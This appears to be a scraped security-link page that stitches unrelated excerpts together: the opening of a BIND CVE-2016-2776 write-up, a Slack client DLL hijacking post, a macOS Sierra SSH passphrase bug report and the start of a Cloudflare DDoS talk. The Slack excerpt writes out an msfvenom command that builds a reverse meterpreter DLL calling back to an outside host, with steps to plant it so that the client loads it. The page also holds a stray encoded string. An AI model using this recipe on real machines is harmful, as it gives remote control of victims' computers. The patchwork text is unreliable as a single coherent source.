GitHub - guidovranken/openssl-x509-vulnerabilities. A tale of a DNS packet (CVE-2016-2776) ~ Infobyte Security Research Labs. Introduction For a number of years now BIND is the most used DNS server on the internet.
It is the standard system for name resolutions on UNIX platforms and is used in 10 of the 13 root servers of the Name Domain System on the internet. Basically, it is one of the main function of the entire Internet. With this in mind, it isn't everyday that someone finds a vulnerability (CVE-2016-2776) rated HIGH in one of the most used services on the internet ( tests done by ISC (Internet Systems Consortium) discovered a critical error when building a response. Additionally, an advisory in the knowledge base of ISC recognizes that an attack can exploit the vulnerability remotely and probably because of that it receives a HIGH score in terms of severity.One thing that caught our attention from the ISC Advisory was the following quote: This assertion can be triggered even if the apparent source address isn't allowed to make queries (i.e. doesn't match 'allow-query')
Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation. Reverse Meterpreter Shell via Slack Client 2.2.1 – DNSAPI.dll Hijack – ((( obscure channel ))) AKA “Another Stupid Trick To Get A Reverse Shell On A Box” While poking around, I noticed that on launch of the slack.exe client, the “update.exe” process fires and checks the %localappdata%\slack directory for “DNSAPI.dll”.
If it finds it, rundll32.exe loads it: Therefore… we can…give it what it’s looking for… Create a reverse https meterpreter DLL payload called “DNSAPI.dll”: msfvenom -p windows/meterpreter/reverse_https -f dll LHOST=192.168.5.128 LPORT=5555 > DNSAPI.dll Pop it in the current users’ %localappdata%\slack folder: Launch the slack client, get a meterpreter shell: This will also run whenever a user manually does an update check from the GUI: Aside from exploiting an already installed client, I’m pretty sure the “SlackSetup.exe” executable is also vulnerable to DLL hijacking due to the fact that the installer checks the current path for a “version.DLL” file. Exploit responsibly… References: More information about the DLL Preloading remote attack.
Python Kerberos Exploitation Kit. MacOS Sierra permanently remembers SSH key passphrase by default. MacOS Sierra permanently remembers SSH key passphrase by default Summary: After upgrading to macOS Sierra and using SSH to login to an SSH server, I noticed that the passphrase for my SSH key has been permanently remembered by the system.
That is, after rebooting the system, SSH still knows the passphrase for my SSH key, such that I do not need to enter any passphrase to log in to my SSH hosts anymore. This permanent storage of my passphrase was done by default without prompting me, and I cannot find any documentation for this new default feature, so I have no idea how to disable it to restore the original El Capitan behavior that I prefer. As far as I can tell, `ssh-add` is not able to manage this storage of my passphrase.
`ssh-add -l` reports that "The agent has no identities. " even after having just used SSH to log into a server without using my passphrase. Ag9zfm9wZW5yYWRhci1ocmRyEgsSBVJhZGFyGICAgIidgYQKDA. Strange Loop - IP Spoofing — Idea of the day. 20 September 2016 I recently gave a talk at the Strange Loop conference in St Louis.
The recording and slides are available, but for easier consumption here's a transcript. Good morning! This is the DDoS talk. It's always hard to speak about DDoS. But slow Ruby servers are not the subject of this talk. Before we start let me give you a roadmap of this talk. Then I'll make a case that IP spoofing, which is faking the IP addresses, allows the most serious attacks.
I'll conclude that the only way to defend from such attacks is to invest in expensive infrastructure. Finally I'll show how to untangle this mess. Ok, let's start up, let me explain why DDoS attacks are a problem. But why should I know anything about that? Allow me introduce myself. At Cloudflare we operate a service - a globally distributed reverse proxy.
We run servers all around the world. We try not to discriminate websites based on the content they provide. Operating a content neutral service in today's internet is a tough job.